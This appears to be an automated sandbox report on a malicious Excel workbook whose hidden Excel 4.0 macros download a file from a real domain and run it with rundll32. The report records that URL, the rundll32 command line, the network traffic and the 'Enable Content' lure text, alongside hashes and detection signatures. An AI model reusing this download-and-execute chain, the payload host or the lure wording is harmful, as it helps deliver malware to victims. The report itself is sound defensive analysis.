Loading ...

Play interactive tourEdit tour

Analysis Report Document1094680387_02012021.xls

Overview

General Information

Sample Name:Document1094680387_02012021.xls
Analysis ID:356299
MD5:9423ee9775707d51960e0eac95b3f6cc
SHA1:debc0defc997fde77a2f0cee9b3b1fcbed54ea91
SHA256:7034e21128da9ce58c2d5249d3fd73dd766cf90437fa52f79faa50098f359634

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2200 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2372 cmdline: rundll32 ..\MORI.BAST,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Document1094680387_02012021.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0xaf0b:$e1: Enable Editing
  • 0xaf55:$e1: Enable Editing
  • 0xaf73:$e2: Enable Content
Document1094680387_02012021.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\MORI.BAST,DllRegisterServer, CommandLine: rundll32 ..\MORI.BAST,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2200, ProcessCommandLine: rundll32 ..\MORI.BAST,DllRegisterServer, ProcessId: 2372

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for domain / URLShow sources
    Source: healthymachinery.comVirustotal: Detection: 8%Perma Link
    Source: http://healthymachinery.com/health/32-422-76.asspVirustotal: Detection: 8%Perma Link

    Compliance:

    barindex
    Uses new MSVCR DllsShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
    Source: global trafficDNS query: name: healthymachinery.com
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.149.197:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.149.197:80
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: global trafficHTTP traffic detected: GET /health/32-422-76.assp HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: healthymachinery.comConnection: Keep-Alive
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
    Source: global trafficHTTP traffic detected: GET /health/32-422-76.assp HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: healthymachinery.comConnection: Keep-Alive
    Source: rundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: unknownDNS traffic detected: queries for: healthymachinery.com
    Source: rundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: rundll32.exe, 00000003.00000002.2084703023.0000000001D97000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: rundll32.exe, 00000003.00000002.2084703023.0000000001D97000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: rundll32.exe, 00000003.00000002.2084703023.0000000001D97000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: rundll32.exe, 00000003.00000002.2084703023.0000000001D97000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: rundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: rundll32.exe, 00000003.00000002.2084703023.0000000001D97000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: 32-422-76[1].htm.0.drString found in binary or memory: https://www.cloudflare.com/5xx-error-landing

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing 1 11 12 1 from the yellow bar above 13 14 1 @Once You have Enable Editing, please
    Source: Screenshot number: 4Screenshot OCR: Enable Content 15 1 from the yellow bar above 16 CI 17 I " I WHY I CANNOTOPEN THIS DOCUMENT? 19
    Source: Document image extraction number: 2Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
    Source: Document image extraction number: 2Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 8Screenshot OCR: Enable Editing from the yellow bar above @Once You have Enable Editing, please click Enable Conten
    Source: Document image extraction number: 8Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? wYou are using IDS or Andr
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: Document1094680387_02012021.xlsInitial sample: EXEC
    Source: Document1094680387_02012021.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
    Source: rundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal76.expl.evad.winXLS@3/8@1/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\76CE0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBE9D.tmpJump to behavior
    Source: Document1094680387_02012021.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\MORI.BAST,DllRegisterServer
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\MORI.BAST,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\MORI.BAST,DllRegisterServer
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Document1094680387_02012021.xlsInitial sample: OLE indicators vbamacros = False
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: Document1094680387_02012021.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    healthymachinery.com8%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://healthymachinery.com/health/32-422-76.assp8%VirustotalBrowse
    http://healthymachinery.com/health/32-422-76.assp0%Avira URL Cloudsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    healthymachinery.com
    172.67.149.197
    truetrueunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://healthymachinery.com/health/32-422-76.assptrue
    • 8%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2084703023.0000000001D97000.00000002.00000001.sdmpfalse
      high
      http://www.windows.com/pctv.rundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmpfalse
        high
        http://investor.msn.comrundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmpfalse
          high
          http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmpfalse
            high
            http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2084703023.0000000001D97000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2084703023.0000000001D97000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmpfalse
              high
              http://investor.msn.com/rundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmpfalse
                high
                https://www.cloudflare.com/5xx-error-landing32-422-76[1].htm.0.drfalse
                  high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  172.67.149.197
                  unknownUnited States
                  13335CLOUDFLARENETUStrue

                  General Information

                  Joe Sandbox Version:31.0.0 Emerald
                  Analysis ID:356299
                  Start date:22.02.2021
                  Start time:21:42:12
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 4m 23s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:Document1094680387_02012021.xls
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:6
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal76.expl.evad.winXLS@3/8@1/1
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .xls
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Found warning dialog
                  • Click Ok
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  CLOUDFLARENETUSNew Order.exeGet hashmaliciousBrowse
                  • 104.21.71.230
                  PO#87498746510.exeGet hashmaliciousBrowse
                  • 172.67.172.17
                  muOvK6dngg.exeGet hashmaliciousBrowse
                  • 172.67.141.244
                  rieuro.dllGet hashmaliciousBrowse
                  • 104.20.185.68
                  TT.exeGet hashmaliciousBrowse
                  • 172.67.172.17
                  Payment_pdf.exeGet hashmaliciousBrowse
                  • 172.67.172.17
                  One Note shergott@vivaldicap.com.htmlGet hashmaliciousBrowse
                  • 104.16.18.94
                  TT.exeGet hashmaliciousBrowse
                  • 172.67.172.17
                  AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                  • 104.21.62.185
                  purchase order 1.exeGet hashmaliciousBrowse
                  • 172.67.188.154
                  telex transfer.exeGet hashmaliciousBrowse
                  • 172.67.188.154
                  GPP.exeGet hashmaliciousBrowse
                  • 172.67.188.154
                  DHL Shipment Notification 6368638172.pdf.exeGet hashmaliciousBrowse
                  • 104.21.19.200
                  #11032019 de investigaci#U00f3n de #U00f3rdenes,pdf.exeGet hashmaliciousBrowse
                  • 104.21.19.200
                  Neue Bestellung_WJO-001, pdf.exeGet hashmaliciousBrowse
                  • 104.21.19.200
                  Halkbank_Ekstre_20210222_082357_541079.exeGet hashmaliciousBrowse
                  • 104.21.19.200
                  swift payment.docGet hashmaliciousBrowse
                  • 104.21.19.200
                  FAX-MESSAGE201636576736375362.hTMlGet hashmaliciousBrowse
                  • 104.16.18.94
                  Order_C3350191107102300.exeGet hashmaliciousBrowse
                  • 172.67.188.154
                  SecuriteInfo.com.Trojan.Inject4.6572.17143.exeGet hashmaliciousBrowse
                  • 23.227.38.74

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\32-422-76[1].htm
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:HTML document, ASCII text
                  Category:downloaded
                  Size (bytes):4318
                  Entropy (8bit):4.978706497143023
                  Encrypted:false
                  SSDEEP:96:1j9jwIjYjyDK/DZD8jH+k1fiPvJADh/pRscs1szbGD:1j9jhjYjWK/lyH+k0RADh/pmcs1sfGD
                  MD5:2885250688BD4C1C1BB0ABE37E258DDC
                  SHA1:A0C1355880E29CA2B53A875CB3C296FA6E7EA829
                  SHA-256:BE620E05FC49EFF7529785A5D8B96E40B9F1668BBC80B7C33EC46453DEBB3AE4
                  SHA-512:BD118277C49F05C733EEBD7F674877749639EC64D9C55ADAA72E3DDFB669EECF83F8D9238C53F7C92FF9702D5C8218F3799335E6FBDE36BE964B0AA243E97364
                  Malicious:false
                  Reputation:low
                  IE Cache URL:http://healthymachinery.com/health/32-422-76.assp
                  Preview: <!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...
                  C:\Users\user\AppData\Local\Temp\B5CE0000
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):26497
                  Entropy (8bit):7.568364582865906
                  Encrypted:false
                  SSDEEP:384:1nnowDuBP+y+mjZ0VTquDznB3dPjZ8aoVT0QNuzWKPqGndVVBdd:1nnlDuBP+Tmje3nXPj6W+u7qkPLdd
                  MD5:F3B6E4C5C9FA1158B6FAC9252C28F970
                  SHA1:0EF9E1DCD12EE01EB92F610564D8AEB7F1F67A98
                  SHA-256:569F33677C782BF3A4C8421D4F3C6A76BEEBB41DD2FD3D845C37193758254461
                  SHA-512:D3C42FBAEBE32348686ADFCCA0E00E3EC2F3977DCAA0C74BAE0200A835993113D0112B017CACECBD884B4B4FD542257144F26C06D679A3E8514B7C641940B7AE
                  Malicious:false
                  Reputation:low
                  Preview: .U.n.0....?..........C....I?.&..an.0.........#.z.Bj.Fq8..XS=CD.]......I...Z.....*L.)a...m.......6.VT.e}J.;.({........G+....!..~9.}.....)c......I...wJ...z.].j...h)....N..~.....O........ Y...1>@Jd..?..\..m...WD0.W2!s...b.{......C.y;...'-`...{..........z...9...X.F.iJb..2..'..hNh....S.D^n....'9.~.I...Qt.*d...z.f.3..Ov.m7.......qL[.xf.;.).^DP..6rwv..cO.PQ.d.|x.x......F^.......{....}...qG8].k...u .I...........{g..cE.:...1.........PK..........!.................[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Feb 23 04:42:36 2021, atime=Tue Feb 23 04:42:36 2021, length=12288, window=hide
                  Category:dropped
                  Size (bytes):867
                  Entropy (8bit):4.468842484038273
                  Encrypted:false
                  SSDEEP:12:85Qc0LgXg/XAlCPCHaXgzB8IB/iGkZX+Wnicvb4AubDtZ3YilMMEpxRljKXlcTdK:85Zi/XTwz6IAjYekAiDv3qPrNru/
                  MD5:E382379E6F8EC21891A4C09FC78B2C33
                  SHA1:81B9B99F3BF9B4519E6ED6013413BF3327D48BF3
                  SHA-256:657B78085B6180BD0BADC5FF6667219E2DF14FC6FC2FA0A0A4F1F550AF56C650
                  SHA-512:53FD2827C93CB851ED840261AE22E4BEEC4D398B091B823C95D7F8EF092FCFD3998612EB1866F694502555110424FF591234D659DF437E9DB1A3EFB1521872A0
                  Malicious:false
                  Reputation:low
                  Preview: L..................F...........7G..O.z.....O.z......0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....WRS-..Desktop.d......QK.XWRS-*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\724536\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......724536..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Document1094680387_02012021.LNK
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Tue Feb 23 04:42:36 2021, atime=Tue Feb 23 04:42:36 2021, length=44032, window=hide
                  Category:dropped
                  Size (bytes):2198
                  Entropy (8bit):4.500480590351624
                  Encrypted:false
                  SSDEEP:24:8HYn/XTwz6I4U8WcqFekAxqZDv3qPdM7dD2HYn/XTwz6I4U8WcqFekAxqZDv3qPg:8M/XT3Ing+YJPQh2M/XT3Ing+YJPQ/
                  MD5:401E0C09D6A3D5BFFF6B567EC7699127
                  SHA1:2D7471A620659CF28658DD30702654F86E33A703
                  SHA-256:BB865549E2FD35FE53C099CBFF8746859936D9F6706558D4860DAA8B0D134E19
                  SHA-512:0018087D2F3EAF6D42CE5E01C82F38AE074D4D6FB6F0E2CAB1AAC6B23E153474C42F2A669F8AC6897DA8679A6290202F39F65D70584CE860084F868DD9561772
                  Malicious:false
                  Reputation:low
                  Preview: L..................F.... ...$l...{..O.z.....p...................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....WRO- .DOCUME~1.XLS..l.......Q.y.Q.y*...8.....................D.o.c.u.m.e.n.t.1.0.9.4.6.8.0.3.8.7._.0.2.0.1.2.0.2.1...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\724536\Users.user\Desktop\Document1094680387_02012021.xls.6.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.o.c.u.m.e.n.t.1.0.9.4.6.8.0.3.8.7._.0.2.0.1.2.0.2.1...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):134
                  Entropy (8bit):4.703385008978903
                  Encrypted:false
                  SSDEEP:3:oyBVomMUdRRMJ9+XVEAl5S/dRRMJ9+XVEAlmMUdRRMJ9+XVEAlv:dj6zJVArS6JVAxzJVA1
